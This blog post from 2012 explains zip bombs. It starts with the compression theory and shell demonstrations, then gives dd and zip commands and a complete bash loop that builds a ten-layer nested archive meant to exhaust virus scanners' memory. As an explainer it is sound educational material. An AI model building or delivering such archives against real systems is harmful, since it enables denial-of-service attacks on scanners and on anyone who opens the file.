Friday, October 5, 2012

How 4.5 Petabytes can be compressed to 42 Kilobytes



Theoretical part by I_Wont_Draw_That

Compression comes down to information theory, the branch of mathematics and computer science devoted to quantifying the amount of information in a string of characters. The attack involves compressing a string which is extremely long, but contains very little information.
Consider the string: abcdefghijklmnopqrstuvwxyz
That is 26 characters. However, the amount of information stored in it may be lower. I could instead represent it as "the English alphabet", which is only 20 characters, and you would still know what I mean. Given enough context, I could represent it as just "alphabet". And given a shared understanding that "0 means abcdefghijklmnopqrstuvwxyz", I could represent it as "0".
Now consider this string: aaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbbaaabbb
That's 72 characters. But what if I gave you something like: 
0=aaa 1=bbb 010101010101010101010101
That's only 36 characters. Or what if I compressed it more? 
0=aaabbb 000000000000
That's only 21 characters. So we compressed our input from 72 characters to 21 characters without losing any information. This is effectively what zipping a file does. It builds a dictionary of common patterns, aliasing them to shorter strings, and then uses the aliases in their place.
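You can watch a real compressor do exactly this. Here's a quick demonstration under bash, using gzip on the pattern from above (the exact compressed size will vary slightly with your gzip version, but it comes out to a few dozen bytes):
$ printf 'aaabbb%.0s' {1..1000} | wc -c
6000
$ printf 'aaabbb%.0s' {1..1000} | gzip -9 | wc -c
Six thousand characters of input, a few dozen bytes of output, because the whole string is one six-character pattern repeated.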
The fewer unique substrings there are, the more compressible the data is, because the dictionary can be smaller, so each alias can be shorter. What happens, then, if the entire input is one pattern repeated many, many times?
For instance, suppose the original string had been 0 repeated a trillion times. To write that string out completely would require 1 terabyte (1 byte per "0" times a trillion of them). But as you just saw, I can easily represent it just as well as "0 repeated a trillion times", which is much, much shorter. That's basically what's happening here. The original content is extremely large, but equally simple, so it compresses into almost nothing. When inflated, it's gigantic.
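You can try a scaled-down version of this yourself. Under DEFLATE (the algorithm zip and gzip share), a long run of zero bytes shrinks by roughly a factor of a thousand; the exact output size varies a little by tool and version:
$ head -c 1000000 /dev/zero | gzip -9 | wc -c
That prints a figure in the neighbourhood of a kilobyte for a megabyte of input. The same ratio is what makes the practical construction below work.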
This extreme runs the other way, as well. For any given compression algorithm, there are inputs which cannot be compressed at all: a simple counting argument shows that there are more possible strings of a given length than there are shorter strings to map them to, so some inputs must come out no smaller, or even larger.
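Random data is the classic case: it has no repeated patterns for the dictionary to exploit, so running it through a compressor actually makes it slightly bigger, since the output still has to carry the format's own headers:
$ head -c 1000000 /dev/urandom | gzip -9 | wc -c
Expect a number a little over 1000000.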

Practical part by Rohaq

Basic zip bombs are pretty easy to make.
Create a massive file, let's say, a gig in size, which is full of zeroes, then zip it up. Because the content of the file is uniformly repeated throughout, it compresses very easily:
$ dd if=/dev/zero bs=1024 count=1000000 | zip zipbomb1.zip -
  adding: -1000000+0 records in
1000000+0 records out
1024000000 bytes (1.0 GB) copied, 9.97309 s, 103 MB/s
 (deflated 100%)
$ ls -lh zipbomb1.zip
-rw-r--r-- 1 me me 971K 2012-08-01 18:21 zipbomb1.zip
(The above is under Linux, and pushes 1024*1000000 zero bytes (null bytes, not the character '0') into a zip file with standard compression. dd writes its progress summary to stderr, which is why it interleaves with zip's "adding: -" output above.)
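As an aside, you can verify the payload without inflating anything: a zip's central directory stores each member's uncompressed size, so listing the archive is safe. (The exact column layout varies by unzip version.)
$ unzip -l zipbomb1.zip
The Length column will report 1024000000 bytes for the single entry, even though the archive itself is only 971K on disk.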
Copy that zip file ten times over. Then add all of these zip files into a single zip file. Because the file content across each zip file is exactly the same, again, this compresses very well:
$ zip -9 zipbomb-lvl2-1.zip zipbomb*
  adding: zipbomb10.zip (deflated 100%)
  adding: zipbomb1.zip (deflated 100%)
  adding: zipbomb2.zip (deflated 100%)
  adding: zipbomb3.zip (deflated 100%)
  adding: zipbomb4.zip (deflated 100%)
  adding: zipbomb5.zip (deflated 100%)
  adding: zipbomb6.zip (deflated 100%)
  adding: zipbomb7.zip (deflated 100%)
  adding: zipbomb8.zip (deflated 100%)
  adding: zipbomb9.zip (deflated 100%)
$ ls -lh zipbomb-lvl2-1.zip 
-rw-r--r-- 1 me me 28K 2012-08-01 18:26 zipbomb-lvl2-1.zip
(The above adds all of the copied zip files into the zip file zipbomb-lvl2-1.zip with the highest level of compression)
Now copy that zip file ten times over, and zip them all up again. Rinse and repeat, let's say 10 layers deep; a shell loop that automates the whole process is sketched below.
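Here's a rough sketch of a bash loop that automates it. The zipbomb-lvlN-M.zip naming is just an illustrative choice, not anything standard; it builds ten nesting layers on top of the base archive, which matches the figures below:
#!/bin/bash
# Layer 0: a 1 GB file of zero bytes, zipped.
dd if=/dev/zero bs=1024 count=1000000 | zip zipbomb-lvl0-1.zip -
# Ten rounds of copy-ten-times-and-rezip. Each round multiplies
# the fully-inflated size by ten.
for level in $(seq 1 10); do
    prev=$((level - 1))
    for i in $(seq 2 10); do
        cp "zipbomb-lvl$prev-1.zip" "zipbomb-lvl$prev-$i.zip"
    done
    zip -9 "zipbomb-lvl$level-1.zip" zipbomb-lvl$prev-*.zip
    rm zipbomb-lvl$prev-*.zip   # tidy up the previous layer's copies
done
# zipbomb-lvl10-1.zip now inflates, fully, to 10^10 copies of the 1 GB payload.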
So, following from the compression basics mentioned above, and ignoring individual file headers and the like, the whole nested structure could be written as something as simple as:
[[[[[[[[[[[0]{1024000000}]{10}]{10}]{10}]{10}]{10}]{10}]{10}]{10}]{10}]{10}
Now a virus scanner comes along and attempts to scan the zip file. It decompresses the first set of zips, then decompresses each of those, then each of those, and so on. Eventually it reaches the lowest layer and attempts to decompress those files into memory. At this point it is trying to decompress 10^10 1 GB files, so unless you have about 9.3 exabytes of RAM at hand, you're in trouble. And since some scanners automatically scan new files, you could be in trouble as soon as you receive or open the file.
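As a quick sanity check on that figure, taking 1 GB as 2^30 bytes: 10^10 of them is 10^10 * 2^30 bytes, and dividing by 2^60 bytes per exabyte leaves 10^10 / 2^30, which bc confirms:
$ echo 'scale=1; 10^10 / 2^30' | bc
9.3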
Scanners nowadays generally have checks in place to make sure that they're not affected by zip bombs, however, which is probably why MSE is no longer detecting it as a threat.
